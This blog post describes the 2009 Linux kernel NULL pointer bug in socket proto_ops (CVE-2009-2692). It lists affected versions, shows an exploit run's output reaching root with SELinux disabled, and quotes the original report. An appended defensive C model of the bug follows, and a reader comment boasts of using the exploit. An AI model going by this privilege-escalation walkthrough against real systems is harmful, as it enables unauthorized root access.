Linux kernel bug (2009)

A fairly serious bug has been found in the Linux kernel, caused by a NULL pointer. If exploited, it can go as far as getting root... osram........ The system would do anything for you..

Almost all kernels from version 2.4 through 2.6 are affected by this bug:
- Linux 2.4, from 2.4.4 up to and including 2.4.37.4
- Linux 2.6, from 2.6.0 up to and including 2.6.30.4

exploit testing:

$ ./script
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xffffffff80bb4348
[+] Resolved selinux_enabled to 0xffffffff80bb4344
[+] Resolved security_ops to 0xffffffff80bb2ae0
[+] Resolved default_security_ops to 0xffffffff808e55a0
[+] Resolved sel_read_enforce to 0xffffffff803e16e0
[+] Resolved audit_enabled to 0xffffffff80ae2ec4
[+] Resolved commit_creds to 0xffffffff8026d3f0
[+] Resolved prepare_kernel_cred to 0xffffffff8026d040
[+] got ring0!
[+] detected 2.6 style 4k stacks
sh: mplayer: not found
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
#
# id
uid=0(root) gid=0(root)
#


Original bug report:

Linux NULL pointer dereference due to incorrect proto_ops initializations
-------------------------------------------------------------------------

In the Linux kernel, each socket has an associated struct of operations
called proto_ops which contain pointers to functions implementing various
features, such as accept, bind, shutdown, and so on.

If an operation on a particular socket is unimplemented, they are expected
to point the associated function pointer to predefined stubs, for example if
the "accept" operation is undefined it would point to sock_no_accept(). However,
we have found that this is not always the case and some of these pointers are
left uninitialized.

-- -- -- --
http://www.cr0.org/misc/CVE-2009-2692.txt
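
The report above describes operation tables whose unimplemented slots are left unset instead of pointing at a stub. The following is an added example, not code from the report or from the kernel: a user-space C model of that pattern with two defensive checks, an audit that fills empty slots when the table is registered and a guard at the call site. Every name in it (ops_model, sock_model, ops_fill_missing, call_accept) is hypothetical, and the stub returning -EOPNOTSUPP is this model's choice.

```c
/* Added example: user-space model, not kernel code. All names are hypothetical. */
#include <errno.h>
#include <stddef.h>

struct sock_model;
typedef int (*op_fn)(struct sock_model *);

/* Stand-in for proto_ops: one function pointer per socket operation. */
struct ops_model { op_fn accept; op_fn bind; op_fn shutdown; };
struct sock_model { struct ops_model *ops; };

/* Predefined stub, in the role sock_no_accept() has in the report. */
static int op_not_supported(struct sock_model *s) { (void)s; return -EOPNOTSUPP; }
static int demo_bind(struct sock_model *s) { (void)s; return 0; }

/* Registration-time audit: point every unset slot at the stub and
 * return how many slots had been left NULL. */
int ops_fill_missing(struct ops_model *ops)
{
    op_fn *slots[] = { &ops->accept, &ops->bind, &ops->shutdown };
    int fixed = 0;
    for (size_t i = 0; i < sizeof slots / sizeof slots[0]; i++)
        if (*slots[i] == NULL) { *slots[i] = op_not_supported; fixed++; }
    return fixed;
}

/* Call-site guard: refuse to call through a NULL slot even when the
 * table was never audited. */
int call_accept(struct sock_model *s)
{
    if (s == NULL || s->ops == NULL || s->ops->accept == NULL)
        return -EOPNOTSUPP;
    return s->ops->accept(s);
}

int main(void)
{
    /* Constructed sample: only .bind is named, so C zero-initializes
     * .accept and .shutdown, which makes them NULL. */
    struct ops_model t = { .bind = demo_bind };
    struct sock_model s = { &t };
    int guarded = call_accept(&s);     /* -EOPNOTSUPP, no call through NULL */
    int fixed = ops_fill_missing(&t);  /* 2 slots were empty */
    return !(guarded == -EOPNOTSUPP && fixed == 2 && t.accept(&s) == -EOPNOTSUPP);
}
```

Members omitted from a C designated initializer are zero, so a "left uninitialized" slot in a static table is a NULL function pointer rather than random data.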

Comments

Computer2 said…
Awesome, bro... I've already used it on my end just for fun
